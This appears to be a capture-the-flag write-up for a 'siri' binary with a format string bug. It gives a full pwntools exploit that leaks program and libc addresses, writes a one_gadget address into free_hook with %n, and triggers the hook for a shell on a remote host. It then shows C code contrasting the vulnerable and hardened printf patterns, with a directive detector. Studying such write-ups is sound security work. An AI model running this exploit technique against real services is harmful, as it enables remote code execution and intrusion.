The vulnerability is in the function sub_1212: the printf(%s) call there gives a format string vulnerability.
The plan is to first use the format string bug to leak the program base and the libc base, then overwrite free_hook with a one_gadget address, and finally print a large amount of data to trigger it.
The final exploit is as follows:
```python
#coding:utf8
# Python 2 / pwntools exploit as posted in the writeup (str-based I/O).
from pwn import *
#context.log_level = "debug"
x = 0
while(1):
    # p = process("./siri")
    p = remote('123.56.170.202', 12124)
    p.recvuntil(">>> ")
    p.sendline("hey siri!")
    p.recvuntil("what can i do for you?")

    # Leak 1: stack words via %p; the first word gives the program base.
    p.sendline("remind me to %1$p,%2$p,%3$p,%4$p,%5$p,")
    p.recvuntil(">>> ok, i'll remind you to ")
    buf = p.recvuntil(",(nil),(nil),")
    prog_base = int(buf[2:-13], 16) & 0xffffffffffff000 - 0x2000
    log.info("prog_base @ 0x%x" % (prog_base))

    # Leak 2: the saved __libc_start_main return address at offset 83
    # gives the libc base.
    p.sendline("hey siri!")
    p.recvuntil("what can i do for you?")
    p.sendline("remind me to %83$p,%2$p,%3$p,")
    p.recvuntil(">>> ok, i'll remind you to ")
    buf = p.recvuntil(",(nil),(nil),\n")
    libc_base = (int(buf[2:-14], 16) & 0xffffffffffff000) - 0x21000  # libc_start_main
    free_hook = libc_base + 0x3ed8e8
    gadget = libc_base + 0x10a45c
    log.info("libc_base @ 0x%x" % (libc_base))
    log.info("free_hook @ 0x%x" % (free_hook))
    log.info("gadget @ 0x%x" % (gadget))

    # Write the one_gadget address into free_hook one byte at a time with %n;
    # the width padding is adjusted by the 27 characters already printed.
    for i in range(6):
        p.sendline("hey siri!")
        p.recvuntil("what can i do for you?")
        p.sendline("remind me to %%%03dx%%15$naaa" % ((ord(p64(gadget)[i]) - 27 + 256) % 256) + p64(free_hook + i))
        p.recvuntil(">>> ok, i'll remind you to ")

    # Print a large amount of data to trigger the hook.
    p.sendline("hey siri!")
    p.recvuntil("what can i do for you?")
    p.sendline("remind me to %100000c")
    p.interactive()
    break
```
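For the defensive side of the bug described above, here is an added example (not code from the writeup or the challenge binary) showing the vulnerable pattern beside its hardened form, plus an input check; the reply prefix is taken from the writeup's output, while the function names are my own.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define REPLY_PREFIX ">>> ok, i'll remind you to "

/* Thin wrapper around vsnprintf; stands in for the challenge's printf call. */
static int format_into(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int r = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return r;
}

/* Vulnerable pattern: the user's text *is* the format string, so "%p"
 * leaks stack words and "%n" writes to memory (the primitives the writeup uses). */
int reminder_unsafe(char *out, size_t n, const char *user)
{
    int len = snprintf(out, n, "%s", REPLY_PREFIX);
    if (len < 0 || (size_t)len >= n)
        return -1;
    return format_into(out + len, n - (size_t)len, user); /* undefined behaviour on '%' */
}

/* Hardened form: the format is a literal and the user text is only a %s
 * argument, so '%' sequences in the input are copied verbatim. */
int reminder_safe(char *out, size_t n, const char *user)
{
    int len = snprintf(out, n, REPLY_PREFIX "%s", user);
    return (len < 0 || (size_t)len >= n) ? -1 : len;
}

/* Input-validation / detection helper: does the text contain a conversion
 * directive? "%%" is an escaped percent sign and does not count. */
int has_format_directive(const char *s)
{
    for (const char *p = strchr(s, '%'); p; p = strchr(p + 1, '%')) {
        if (p[1] == '%') { p++; continue; }  /* skip the escaped pair */
        return 1;
    }
    return 0;
}
```

Compiling with gcc -Wformat-security flags a direct printf(user) call; the wrapper in reminder_unsafe hides it from that warning, which is why the literal-format form is the reliable fix.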